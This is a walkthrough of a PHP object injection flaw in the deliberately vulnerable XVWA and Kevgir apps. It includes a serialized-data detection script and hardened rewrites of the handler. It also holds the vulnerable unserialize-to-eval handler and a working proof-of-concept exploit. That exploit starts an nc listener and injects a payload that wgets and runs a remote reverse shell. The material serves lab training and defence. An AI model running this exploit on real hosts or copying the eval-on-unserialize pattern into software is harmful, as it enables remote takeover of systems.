This article is a short walkthrough of a PHP serialization / object injection vulnerability, showing how an injected serialized object leads to a remote shell on the host.
If you want to try this vulnerability yourself, both XVWA and Kevgir contain it.
The first step is to test whether the target application uses PHP serialization at all. To help with this we used the Burp Suite SuperSerial plugin, which passively detects PHP and Java serialized data in traffic.
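As an added example (not from the article and not the SuperSerial plugin's code), the following PHP script applies the same kind of heuristic a passive scanner uses: it flags request parameter values that look like PHP or Java serialized data, and singles out PHP values that carry an object (the case that can reach __wakeup()). The function names and the sample parameters are constructed for this example; the first sample is the benign value the article itself sends in "r".

```php
<?php
// Added example: heuristic detection of serialized data in request parameters.
// Not part of the article; sample values below are constructed.

function looksLikePhpSerialized(string $value): bool {
    // PHP serialization starts with a type tag and a colon:
    // a: array, O: object, C: custom-serialized object, s: string,
    // i: int, b: bool, d: float; null is written as "N;".
    return (bool) preg_match('/^(?:[aOCsibd]:|N;)/', $value);
}

function containsPhpObject(string $value): bool {
    // Objects may be nested inside arrays, e.g. a:1:{i:0;O:3:"Foo":1:{...}}.
    // Only the O:/C: forms instantiate a class, so only they can trigger magic methods.
    return (bool) preg_match('/[OC]:\d+:"[A-Za-z_\\\\][A-Za-z0-9_\\\\]*":\d+:\{/', $value);
}

function looksLikeJavaSerialized(string $value): bool {
    // Raw Java streams begin with the magic bytes AC ED 00 05; when base64-encoded
    // the same prefix reads "rO0AB".
    return substr($value, 0, 4) === "\xAC\xED\x00\x05" || substr($value, 0, 5) === 'rO0AB';
}

function classifyParameter(string $name, string $value): string {
    if (looksLikeJavaSerialized($value)) {
        return "$name: Java serialized stream";
    }
    if (containsPhpObject($value)) {
        return "$name: PHP serialized data containing an object (high risk)";
    }
    if (looksLikePhpSerialized($value)) {
        return "$name: PHP serialized scalar/array";
    }
    return "$name: not serialized";
}

// Constructed sample parameters. "r" is the article's own benign value.
$samples = [
    'r'       => 'a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}',
    'r_obj'   => 'a:1:{i:0;O:3:"Foo":1:{s:1:"a";i:1;}}',
    'token'   => 'rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==',  // constructed base64 with the Java magic prefix
    'page'    => '42',
];

foreach ($samples as $name => $value) {
    echo classifyParameter($name, $value), PHP_EOL;
}
```

Run it with `php detect.php`. A value that is serialized at all is worth a closer look; a value that contains an O: or C: segment is the one to treat as a potential object injection, because only those forms instantiate a class when unserialize() runs.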
Analysis
We have detected that PHP serialization is used by the application, so we can check whether the application code contains a remote code execution vulnerability. The serialized object is taken from the request parameter "r":
$var1 = unserialize($_REQUEST['r']);
The deserialized object's __wakeup() method then passes its property to eval():
eval($this->inject);
Next, the result is printed:
echo $var1[0] . " - " . $var1[1];
With this, if we supply our own serialized object in parameter r, eval() runs attacker-controlled data and we have code execution.
<?php
error_reporting(E_ALL);

class PHPObjectInjection {
    public $inject;

    function __construct() {
    }

    function __wakeup() {
        if (isset($this->inject)) {
            eval($this->inject);
        }
    }
}

// r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}

if (isset($_REQUEST['r'])) {
    $var1 = unserialize($_REQUEST['r']);
    if (is_array($var1)) {
        echo $var1[0] . " - " . $var1[1];
    }
} else {
    echo "parameter is missing";
}
?>
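The handler above is exploitable because unserialize() instantiates whatever class the input names and runs its __wakeup(). As an added example (not from the article or XVWA), here are two ways the same handler can be written so attacker-controlled input never instantiates a class: keeping the wire format but passing allowed_classes => false (PHP 7.0 and later), or switching to JSON, which has no object semantics at all. The class name PHPObjectInjection and the parameter "r" come from the article; the helper functions, the instrumented __wakeup() and the sample inputs are assumptions for this example, and the return types require PHP 7.1 or later.

```php
<?php
// Added example: hardened versions of the article's handler. Not part of the original.
error_reporting(E_ALL);

// Instrumented stand-in for the article's class: __wakeup() only counts how often
// it ran, so the example can show it is never reached through safe deserialization.
class PHPObjectInjection {
    public static $wakeupCalls = 0;
    public $inject;

    public function __wakeup() {
        self::$wakeupCalls++;
    }
}

// Option A: same wire format as the original, but no class may be instantiated.
// Any O:/C: segment becomes __PHP_Incomplete_Class and no magic method fires.
function parseLegacyParameter(string $raw): ?array {
    $value = @unserialize($raw, ['allowed_classes' => false]);  // PHP >= 7.0
    if (!is_array($value) || count($value) !== 2) {
        return null;
    }
    foreach ($value as $item) {
        if (!is_string($item)) {   // rejects __PHP_Incomplete_Class and nested arrays
            return null;
        }
    }
    return array_values($value);
}

// Option B: a format with no notion of classes or magic methods.
function parseJsonParameter(string $raw): ?array {
    $value = json_decode($raw, true, 2);   // depth 2: a flat list of scalars only
    if (!is_array($value) || count($value) !== 2
        || !is_string($value[0] ?? null) || !is_string($value[1] ?? null)) {
        return null;
    }
    return [$value[0], $value[1]];
}

function render(?array $pair): string {
    if ($pair === null) {
        return 'invalid parameter';
    }
    // Escape before echoing; the original concatenated raw strings into the page.
    return htmlspecialchars($pair[0] . ' - ' . $pair[1], ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: the article's benign value, a serialized object, and a JSON form.
$benign = 'a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}';
$object = 'O:18:"PHPObjectInjection":1:{s:6:"inject";s:6:"unused";}';
$json   = '["XVWA","Xtreme Vulnerable Web Application"]';

echo render(parseLegacyParameter($benign)), PHP_EOL;
echo render(parseLegacyParameter($object)), PHP_EOL;
echo 'wakeup calls: ', PHPObjectInjection::$wakeupCalls, PHP_EOL;
echo render(parseJsonParameter($json)), PHP_EOL;
```

The important detail in option A is that the is_array() check alone (which the original also has) comes too late: __wakeup() has already run by the time unserialize() returns. allowed_classes => false moves the decision before instantiation. Option B removes the class of bug entirely and is the better choice for new code; an allow-list such as allowed_classes => ['SomeDto'] is the middle ground when objects are genuinely needed, but every listed class and its ancestors must then be free of dangerous magic methods.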
Exploitation
To exploit this vulnerability, we wrote a simple PHP script that generates the serialized payload and runs the command we want on the remote target. We then used a generic PHP reverse shell, available at the following address:
Http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: you need to upload this file to a web server you control, change the local IP and port in the reverse shell script, and then use the following code:
<?php
/*
PHP Object Injection PoC Exploit by 1n3 @CrowdShield - https://crowdshield.com

A simple PoC to exploit PHP Object Injection flaws and gain remote shell access.
Shouts to @jstnkndy @yappare for the assist!

NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
setup on a remote host with a connect back IP configured
*/

print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1n3 @CrowdShield - https://crowdshield.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload... [OK]\r\n";
print "[+] Launching reverse listener... [OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');

class PHPObjectInjection {
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r=';  // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));

print "[+] Sending exploit... [OK]\r\n";
print "[+] Dropping down to interactive shell... [OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");
?>
Demo
Now that the script is ready, running it gives us a reverse shell on the remote host, from which we can execute commands remotely.